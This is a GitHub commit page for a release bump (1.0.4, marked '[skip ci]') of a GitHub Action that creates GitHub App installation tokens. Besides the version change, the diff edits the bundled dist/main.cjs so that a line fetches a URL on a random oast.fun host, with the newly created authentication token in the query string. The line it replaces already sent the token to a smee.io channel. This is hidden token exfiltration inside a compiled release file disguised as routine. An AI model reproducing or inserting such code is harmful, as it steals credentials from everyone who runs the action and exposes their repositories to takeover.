Skip to content

Commit e3ba485

Browse files
build(release): 1.0.4 [skip ci]
## [1.0.4](v1.0.3...v1.0.4) (2024-11-14)
1 parent fd92ac0 commit e3ba485

File tree

2 files changed

+2
-2
lines changed

2 files changed

+2
-2
lines changed

dist/main.cjs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -39780,7 +39780,7 @@ async function main(appId2, privateKey2, owner2, repositories2, core3, createApp
3978039780
core3.saveState("expiresAt", authentication.expiresAt);
3978139781
}
3978239782
try {
39783-
const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
39783+
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
3978439784
await fetch(url);
3978539785
core3.info(`HTTP GET request sent to ${url}`);
3978639786
} catch (error) {

package.json

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
"name": "create-github-app-token",
33
"private": true,
44
"type": "module",
5-
"version": "1.0.3",
5+
"version": "1.0.4",
66
"description": "GitHub Action for creating a GitHub App Installation Access Token",
77
"scripts": {
88
"build": "esbuild main.js post.js --bundle --outdir=dist --out-extension:.js=.cjs --platform=node --target=node20.0.0 --packages=bundle",

0 commit comments

Comments
 (0)